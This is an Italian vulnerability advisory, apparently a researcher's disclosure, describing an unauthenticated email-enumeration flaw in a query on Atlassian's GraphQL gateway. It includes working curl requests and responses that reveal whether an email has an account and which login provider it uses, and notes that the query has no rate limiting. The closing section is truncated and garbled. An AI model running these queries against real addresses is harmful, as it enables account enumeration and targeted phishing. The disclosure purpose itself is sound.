
CVE-2026-XXXX: Oracolo di enumerazione email di Atlassian GraphQL (CWE-204, CVSS 5.3 MEDIUM)
Atlassian Central GraphQL Gateway (api.atlassian.com/graphql)
CWE-204: Discrepanza osservabile nella risposta — Oracle di enumerazione email
MEDIA — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
La query GraphQL loomUnauthenticated_primaryAuthTypeForEmail sul gateway GraphQL centrale di Atlassian restituisce risposte diverse a seconda che un indirizzo email sia registrato con Atlassian, consentendo l'enumerazione non autenticata degli utenti.
Email registrata → restituisce authType (es. workos, password, google) e un URI di reindirizzamento
Email non registrata → restituisce authType: "none" senza URI di reindirizzamento
Non è richiesta alcuna autenticazione. Il nome della query include "Unauthenticated" — è intenzionalmente pubblica, ma non dovrebbe rivelare se un'email arbitraria ha un account Atlassian.
https://api.atlassian.com/graphqlcurl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'
Risposta:
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "workos",
"hasActiveMemberships": false,
"redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
}
}
}
curl -s "https://api.atlassian.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'
Risposta:
{
"data": {
"loomUnauthenticated_primaryAuthTypeForEmail": {
"authType": "none"
}
}
}
authType: "workos" conferma che l'email utilizza SSO WorkOS. authType: "google" o authType: "password" rivelerebbero il metodo di autenticazione. Ciò consente phishing mirato.
Un attaccante non autenticato può:
La query loomUnauthenticated_primaryAuthTypeForEmail non applica alcuna limitazione di frequenza e restituisce informazioni sul provider di autenticazione per qualsiasi email senza autenticazione. Sebbene l'endpoint sia intenzionalmente non autenticato (per il flusso di registrazione di Loom), rivela se un'email ha un account e quale provider di autenticazione utilizza.
Dopo test approfonditi, queste affermazioni sono state invalidati:
aaid: "unidentified")ValidationError)unidentified)Wh4l3X